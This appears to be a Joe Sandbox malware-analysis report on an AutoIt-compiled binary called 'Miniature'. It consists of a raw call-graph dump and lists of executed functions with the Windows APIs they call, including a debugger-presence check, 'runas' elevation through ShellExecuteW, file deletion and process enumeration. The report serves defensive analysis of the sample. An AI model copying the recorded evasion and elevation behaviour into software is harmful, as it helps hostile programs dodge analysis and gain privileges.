c6659a 104012->104014 104013->104012 105246 c136f5 105249 c1370f 105246->105249 105250 c13726 105249->105250 105251 c1372b 105250->105251 105252 c1378a 105250->105252 105289 c13788 105250->105289 105256 c13804 PostQuitMessage 105251->105256 105257 c13738 105251->105257 105254 c53df4 105252->105254 105255 c13790 105252->105255 105253 c1376f DefWindowProcW 105263 c13709 105253->105263 105304 c12f92 10 API calls 105254->105304 105258 c13797 105255->105258 105259 c137bc SetTimer RegisterWindowMessageW 105255->105259 105256->105263 105260 c13743 105257->105260 105261 c53e61 105257->105261 105264 c53d95 105258->105264 105265 c137a0 KillTimer 105258->105265 105259->105263 105266 c137e5 CreatePopupMenu 105259->105266 105267 c1374d 105260->105267 105268 c1380e 105260->105268 105307 c7c8f7 65 API calls ___scrt_fastfail 105261->105307 105271 c53dd0 MoveWindow 105264->105271 105272 c53d9a 105264->105272 105273 c13907 Shell_NotifyIconW 105265->105273 105266->105263 105274 c53e46 105267->105274 105275 c13758 105267->105275 105294 c2fcad 105268->105294 105270 c53e15 105305 c2f23c 40 API calls 105270->105305 105271->105263 105279 c53da0 105272->105279 105280 c53dbf SetFocus 105272->105280 105281 c137b3 105273->105281 105274->105253 105306 c71423 8 API calls 105274->105306 105282 c13763 105275->105282 105283 c137f2 105275->105283 105276 c53e73 105276->105253 105276->105263 105279->105282 105284 c53da9 105279->105284 105280->105263 105301 c159ff DeleteObject DestroyWindow 105281->105301 105282->105253 105291 c13907 Shell_NotifyIconW 105282->105291 105302 c1381f 75 API calls ___scrt_fastfail 105283->105302 105303 c12f92 10 API calls 105284->105303 105289->105253 105290 c13802 105290->105263 105292 c53e3a 105291->105292 105293 c1396b 60 API calls 105292->105293 105293->105289 105295 c2fcc5 ___scrt_fastfail 105294->105295 105296 c2fd4b 105294->105296 105297 c161a9 55 API calls 105295->105297 105296->105263 105299 c2fcec 105297->105299 105298 c2fd34 KillTimer SetTimer 105298->105296 105299->105298 105300 c6fe2b Shell_NotifyIconW 105299->105300 105300->105298 105301->105263 105302->105290 105303->105263 105304->105270 105305->105282 105306->105289 105307->105276 104015 c65650 104024 c2e3d5 104015->104024 104017 c65666 104018 c656e1 104017->104018 104033 c2aa65 9 API calls 104017->104033 104022 c661d7 104018->104022 104035 c83fe1 81 API calls __wsopen_s 104018->104035 104020 c656c1 104020->104018 104034 c8247e 8 API calls 104020->104034 104025 c2e3e3 104024->104025 104026 c2e3f6 104024->104026 104029 c1b4c8 8 API calls 104025->104029 104027 c2e3fb 104026->104027 104028 c2e429 104026->104028 104030 c3014b 8 API calls 104027->104030 104031 c1b4c8 8 API calls 104028->104031 104032 c2e3ed 104029->104032 104030->104032 104031->104032 104032->104017 104033->104020 104034->104018 104035->104022 104036 c11098 104041 c15fc8 104036->104041 104040 c110a7 104042 c1bf73 8 API calls 104041->104042 104043 c15fdf GetVersionExW 104042->104043 104044 c18577 8 API calls 104043->104044 104045 c1602c 104044->104045 104046 c1adf4 8 API calls 104045->104046 104050 c16062 104045->104050 104047 c16056 104046->104047 104049 c155dc 8 API calls 104047->104049 104048 c1611c GetCurrentProcess IsWow64Process 104051 c16138 104048->104051 104049->104050 104050->104048 104052 c55224 104050->104052 104053 c16150 LoadLibraryA 104051->104053 104054 c55269 GetSystemInfo 104051->104054 104055 c16161 GetProcAddress 104053->104055 104056 c1619d GetSystemInfo 104053->104056 104055->104056 104057 c16171 GetNativeSystemInfo 104055->104057 104058 c16177 104056->104058 104057->104058 104059 c1109d 104058->104059 104060 c1617b FreeLibrary 104058->104060 104061 c30413 29 API calls __onexit 104059->104061 104060->104059 104061->104040 104062 c1105b 104067 c152a7 104062->104067 104064 c1106a 104098 c30413 29 API calls __onexit 104064->104098 104066 c11074 104068 c152b7 __wsopen_s 104067->104068 104069 c1bf73 8 API calls 104068->104069 104070 c1536d 104069->104070 104099 c15594 104070->104099 104072 c15376 104106 c15238 104072->104106 104075 c16b7c 8 API calls 104076 c1538f 104075->104076 104112 c16a7c 104076->104112 104079 c1bf73 8 API calls 104080 c153a7 104079->104080 104081 c1bd57 8 API calls 104080->104081 104082 c153b0 RegOpenKeyExW 104081->104082 104083 c54be6 RegQueryValueExW 104082->104083 104087 c153d2 104082->104087 104084 c54c03 104083->104084 104085 c54c7c RegCloseKey 104083->104085 104086 c3017b 8 API calls 104084->104086 104085->104087 104097 c54c8e _wcslen 104085->104097 104088 c54c1c 104086->104088 104087->104064 104089 c1423c 8 API calls 104088->104089 104090 c54c27 RegQueryValueExW 104089->104090 104091 c54c44 104090->104091 104094 c54c5e messages 104090->104094 104092 c18577 8 API calls 104091->104092 104092->104094 104093 c1655e 8 API calls 104093->104097 104094->104085 104095 c1b329 8 API calls 104095->104097 104096 c16a7c 8 API calls 104096->104097 104097->104087 104097->104093 104097->104095 104097->104096 104098->104066 104100 c522d0 __wsopen_s 104099->104100 104101 c155a1 GetModuleFileNameW 104100->104101 104102 c1b329 8 API calls 104101->104102 104103 c155c7 104102->104103 104104 c15851 9 API calls 104103->104104 104105 c155d1 104104->104105 104105->104072 104107 c522d0 __wsopen_s 104106->104107 104108 c15245 GetFullPathNameW 104107->104108 104109 c15267 104108->104109 104110 c18577 8 API calls 104109->104110 104111 c15285 104110->104111 104111->104075 104113 c16a8b 104112->104113 104117 c16aac __fread_nolock 104112->104117 104115 c3017b 8 API calls 104113->104115 104114 c3014b 8 API calls 104116 c1539e 104114->104116 104115->104117 104116->104079 104117->104114 105308 c1dd3d 105309 c1dd63 105308->105309 105310 c619c2 105308->105310 105311 c1dead 105309->105311 105314 c3014b 8 API calls 105309->105314 105313 c61a82 105310->105313 105318 c61a26 105310->105318 105321 c61a46 105310->105321 105315 c3017b 8 API calls 105311->105315 105353 c83fe1 81 API calls __wsopen_s 105313->105353 105320 c1dd8d 105314->105320 105327 c1dee4 __fread_nolock 105315->105327 105316 c61a7d 105351 c2e6e8 207 API calls 105318->105351 105322 c3014b 8 API calls 105320->105322 105320->105327 105321->105316 105352 c83fe1 81 API calls __wsopen_s 105321->105352 105324 c1dddb 105322->105324 105323 c3017b 8 API calls 105323->105327 105324->105318 105325 c1de16 105324->105325 105326 c20340 207 API calls 105325->105326 105328 c1de29 105326->105328 105327->105321 105327->105323 105328->105316 105328->105327 105329 c61aa5 105328->105329 105330 c1de77 105328->105330 105332 c1d526 105328->105332 105354 c83fe1 81 API calls __wsopen_s 105329->105354 105330->105311 105330->105332 105333 c3014b 8 API calls 105332->105333 105334 c1d589 105333->105334 105335 c1c32d 8 API calls 105334->105335 105336 c1d5b3 105335->105336 105337 c3014b 8 API calls 105336->105337 105342 c1d66e messages 105337->105342 105338 c1c3ab 8 API calls 105341 c1d9ac messages 105338->105341 105339 c1bed9 8 API calls 105339->105342 105340 c1b4c8 8 API calls 105340->105342 105344 c1d9c3 105341->105344 105350 c2e30a 8 API calls messages 105341->105350 105342->105339 105342->105340 105345 c61f79 105342->105345 105347 c61f94 105342->105347 105348 c1c3ab 8 API calls 105342->105348 105349 c1d911 messages 105342->105349 105355 c756ae 8 API calls messages 105345->105355 105348->105342 105349->105338 105349->105341 105350->105341 105351->105321 105352->105316 105353->105316 105354->105316 105355->105347 104118 c1f4dc 104121 c1cab0 104118->104121 104122 c1cacb 104121->104122 104123 c614be 104122->104123 104124 c6150c 104122->104124 104149 c1caf0 104122->104149 104127 c614c8 104123->104127 104130 c614d5 104123->104130 104123->104149 104161 c962ff 207 API calls 2 library calls 104124->104161 104159 c96790 207 API calls 104127->104159 104129 c2bc58 8 API calls 104129->104149 104146 c1cdc0 104130->104146 104160 c96c2d 207 API calls 2 library calls 104130->104160 104133 c6179f 104133->104133 104135 c1cf80 39 API calls 104135->104149 104138 c616e8 104163 c96669 81 API calls 104138->104163 104141 c1be2d 39 API calls 104141->104149 104142 c1cdee 104143 c1b4c8 8 API calls 104143->104149 104146->104142 104164 c83fe1 81 API calls __wsopen_s 104146->104164 104147 c20340 207 API calls 104147->104149 104148 c2e807 39 API calls 104148->104149 104149->104129 104149->104135 104149->104138 104149->104141 104149->104142 104149->104143 104149->104146 104149->104147 104149->104148 104150 c1bed9 8 API calls 104149->104150 104152 c2e7c1 39 API calls 104149->104152 104153 c2aa99 207 API calls 104149->104153 104154 c305b2 5 API calls __Init_thread_wait 104149->104154 104155 c30413 29 API calls __onexit 104149->104155 104156 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104149->104156 104157 c2f4df 81 API calls 104149->104157 104158 c2f346 207 API calls 104149->104158 104162 c6ffaf 8 API calls 104149->104162 104150->104149 104152->104149 104153->104149 104154->104149 104155->104149 104156->104149 104157->104149 104158->104149 104159->104130 104160->104146 104161->104149 104162->104149 104163->104146 104164->104133 105356 c20ebf 105357 c20ed3 105356->105357 105362 c21425 105356->105362 105358 c20ee5 105357->105358 105359 c3014b 8 API calls 105357->105359 105360 c6562c 105358->105360 105361 c1b4c8 8 API calls 105358->105361 105363 c20f3e 105358->105363 105359->105358 105390 c81b14 8 API calls 105360->105390 105361->105358 105362->105358 105366 c1bed9 8 API calls 105362->105366 105365 c22b20 207 API calls 105363->105365 105381 c2049d messages 105363->105381 105387 c20376 messages 105365->105387 105366->105358 105367 c6632b 105394 c83fe1 81 API calls __wsopen_s 105367->105394 105369 c21695 105375 c1bed9 8 API calls 105369->105375 105369->105381 105370 c3014b 8 API calls 105370->105387 105372 c6625a 105393 c83fe1 81 API calls __wsopen_s 105372->105393 105373 c1bed9 8 API calls 105373->105387 105374 c65cdb 105379 c1bed9 8 API calls 105374->105379 105374->105381 105375->105381 105378 c21990 207 API calls 105378->105387 105379->105381 105380 c1bf73 8 API calls 105380->105387 105382 c305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105382->105387 105383 c30413 29 API calls pre_c_initialization 105383->105387 105384 c20aae messages 105392 c83fe1 81 API calls __wsopen_s 105384->105392 105385 c66115 105391 c83fe1 81 API calls __wsopen_s 105385->105391 105387->105367 105387->105369 105387->105370 105387->105372 105387->105373 105387->105374 105387->105378 105387->105380 105387->105381 105387->105382 105387->105383 105387->105384 105387->105385 105388 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105387->105388 105389 c21e50 40 API calls messages 105387->105389 105388->105387 105389->105387 105390->105381 105391->105384 105392->105381 105393->105381 105394->105381 105395 c4947a 105396 c49487 105395->105396 105400 c4949f 105395->105400 105445 c3f649 20 API calls __dosmaperr 105396->105445 105398 c4948c 105446 c42b5c 26 API calls _strftime 105398->105446 105401 c49497 105400->105401 105402 c494fa 105400->105402 105447 c50144 21 API calls 2 library calls 105400->105447 105403 c3dcc5 __fread_nolock 26 API calls 105402->105403 105405 c49512 105403->105405 105415 c48fb2 105405->105415 105407 c49519 105407->105401 105408 c3dcc5 __fread_nolock 26 API calls 105407->105408 105409 c49545 105408->105409 105409->105401 105410 c3dcc5 __fread_nolock 26 API calls 105409->105410 105411 c49553 105410->105411 105411->105401 105412 c3dcc5 __fread_nolock 26 API calls 105411->105412 105413 c49563 105412->105413 105414 c3dcc5 __fread_nolock 26 API calls 105413->105414 105414->105401 105416 c48fbe ___BuildCatchObject 105415->105416 105417 c48fc6 105416->105417 105418 c48fde 105416->105418 105449 c3f636 20 API calls __dosmaperr 105417->105449 105420 c490a4 105418->105420 105425 c49017 105418->105425 105456 c3f636 20 API calls __dosmaperr 105420->105456 105422 c48fcb 105450 c3f649 20 API calls __dosmaperr 105422->105450 105423 c490a9 105457 c3f649 20 API calls __dosmaperr 105423->105457 105427 c49026 105425->105427 105428 c4903b 105425->105428 105451 c3f636 20 API calls __dosmaperr 105427->105451 105448 c454ba EnterCriticalSection 105428->105448 105431 c4902b 105452 c3f649 20 API calls __dosmaperr 105431->105452 105432 c49041 105435 c49072 105432->105435 105436 c4905d 105432->105436 105433 c48fd3 __fread_nolock 105433->105407 105440 c490c5 __fread_nolock 38 API calls 105435->105440 105453 c3f649 20 API calls __dosmaperr 105436->105453 105438 c49033 105458 c42b5c 26 API calls _strftime 105438->105458 105442 c4906d 105440->105442 105441 c49062 105454 c3f636 20 API calls __dosmaperr 105441->105454 105455 c4909c LeaveCriticalSection __wsopen_s 105442->105455 105445->105398 105446->105401 105447->105402 105448->105432 105449->105422 105450->105433 105451->105431 105452->105438 105453->105441 105454->105442 105455->105433 105456->105423 105457->105438 105458->105433

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00C15FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 234 c15fc8-c16037 call c1bf73 GetVersionExW call c18577 239 c5507d-c55090 234->239 240 c1603d 234->240 242 c55091-c55095 239->242 241 c1603f-c16041 240->241 243 c16047-c160a6 call c1adf4 call c155dc 241->243 244 c550bc 241->244 245 c55097 242->245 246 c55098-c550a4 242->246 258 c55224-c5522b 243->258 259 c160ac-c160ae 243->259 249 c550c3-c550cf 244->249 245->246 246->242 248 c550a6-c550a8 246->248 248->241 251 c550ae-c550b5 248->251 252 c1611c-c16136 GetCurrentProcess IsWow64Process 249->252 251->239 254 c550b7 251->254 256 c16195-c1619b 252->256 257 c16138 252->257 254->244 260 c1613e-c1614a 256->260 257->260 265 c5522d 258->265 266 c5524b-c5524e 258->266 263 c55125-c55138 259->263 264 c160b4-c160b7 259->264 261 c16150-c1615f LoadLibraryA 260->261 262 c55269-c5526d GetSystemInfo 260->262 267 c16161-c1616f GetProcAddress 261->267 268 c1619d-c161a7 GetSystemInfo 261->268 269 c55161-c55163 263->269 270 c5513a-c55143 263->270 264->252 271 c160b9-c160f5 264->271 272 c55233 265->272 273 c55250-c5525f 266->273 274 c55239-c55241 266->274 267->268 275 c16171-c16175 GetNativeSystemInfo 267->275 276 c16177-c16179 268->276 280 c55165-c5517a 269->280 281 c55198-c5519b 269->281 277 c55145-c5514b 270->277 278 c55150-c5515c 270->278 271->252 279 c160f7-c160fa 271->279 272->274 273->272 282 c55261-c55267 273->282 274->266 275->276 285 c16182-c16194 276->285 286 c1617b-c1617c FreeLibrary 276->286 277->252 278->252 287 c550d4-c550e4 279->287 288 c16100-c1610a 279->288 289 c55187-c55193 280->289 290 c5517c-c55182 280->290 283 c551d6-c551d9 281->283 284 c5519d-c551b8 281->284 282->274 283->252 295 c551df-c55206 283->295 291 c551c5-c551d1 284->291 292 c551ba-c551c0 284->292 286->285 293 c550f7-c55101 287->293 294 c550e6-c550f2 287->294 288->249 296 c16110-c16116 288->296 289->252 290->252 291->252 292->252 297 c55114-c55120 293->297 298 c55103-c5510f 293->298 294->252 299 c55213-c5521f 295->299 300 c55208-c5520e 295->300 296->252 297->252 298->252 299->252 300->252
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00C15FF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00CADC2C,00000000,?,?), ref: 00C16123
                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C1612A
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C16155
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C16167
                                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00C16175
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C1617C
                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00C161A1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                            • Opcode ID: cad0fa17876022bbc0b675732467ffe28d2453f18d641abe83985ceb8cf342ea
                                                                                                                                                                                                                                                                                            • Instruction ID: 1aba74db2dd5ec558644e6fd802662f42905c605e4d36de99f9f29147a70c734
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cad0fa17876022bbc0b675732467ffe28d2453f18d641abe83985ceb8cf342ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24A1AF2694A6C4DFCB11CB797CC23ED7FAC6B27305B184899D4819B232C66D4988DF35
                                                                                                                                                                                                                                                                                            Function 00C1338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C13368,?), ref: 00C133BB
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C13368,?), ref: 00C133CE
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE2418,00CE2400,?,?,?,?,?,?,00C13368,?), ref: 00C1343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13462,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C142A0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C134BB
                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C53CB0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C53CF1
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CD31F4,00CE2418,?,?,?,?,?,?,?,00C13368), ref: 00C53D7A
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C53D81
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: GetSysColorBrush.USER32(0000000F), ref: 00C134DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00C134ED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(00000063), ref: 00C13503
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(000000A4), ref: 00C13515
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(000000A2), ref: 00C13527
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C1353F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: RegisterClassExW.USER32(?), ref: 00C13590
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C135E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13602
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C13616
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C1361F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13A3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C53CAA
                                                                                                                                                                                                                                                                                            • runas, xrefs: 00C53D75
                                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00C53CA5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                            • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                            • Opcode ID: a6291b2ee163e53966e6fa205692977e0ac049e09e01f479be81c8af248aad45
                                                                                                                                                                                                                                                                                            • Instruction ID: 9fdcf14a17266148ea9d5b6ce1762bc4b1a60c16fde0d1081ebeb5be51f1985b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6291b2ee163e53966e6fa205692977e0ac049e09e01f479be81c8af248aad45
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE5108711083C4AAC701EF609C45FEEBFBD9F86748F000428F592571A2DB649AC9FB22
                                                                                                                                                                                                                                                                                            Function 00C7DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7DCCB
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DD1B
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C7DD2C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DD43
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DD4C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 3a85e0e6dd6a64c43e6bce6aec116de9377a0a5839687318ed758c94c3b05446
                                                                                                                                                                                                                                                                                            • Instruction ID: fa4aba9a36bcc508496a0cc036072a0f05fa89073d2a651d86cd8cb856ecad9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a85e0e6dd6a64c43e6bce6aec116de9377a0a5839687318ed758c94c3b05446
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4314D310083459BC315EB60D8829EFB7F8AEA6304F404A5DF4E693191EB21DE49EB62
                                                                                                                                                                                                                                                                                            Function 00C7DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1574 c7dd87-c7ddcf CreateToolhelp32Snapshot Process32FirstW call c7e80e 1577 c7de7d-c7de80 1574->1577 1578 c7de86-c7de95 CloseHandle 1577->1578 1579 c7ddd4-c7dde3 Process32NextW 1577->1579 1579->1578 1580 c7dde9-c7de58 call c1bf73 * 2 call c1b329 call c1568e call c1bd98 call c17bb5 call c2e36b 1579->1580 1595 c7de62-c7de69 1580->1595 1596 c7de5a-c7de5c 1580->1596 1598 c7de6b-c7de78 call c1bd98 * 2 1595->1598 1597 c7de5e-c7de60 1596->1597 1596->1598 1597->1595 1597->1598 1598->1577
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7DDAC
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C7DDBA
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C7DDDA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7DE87
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
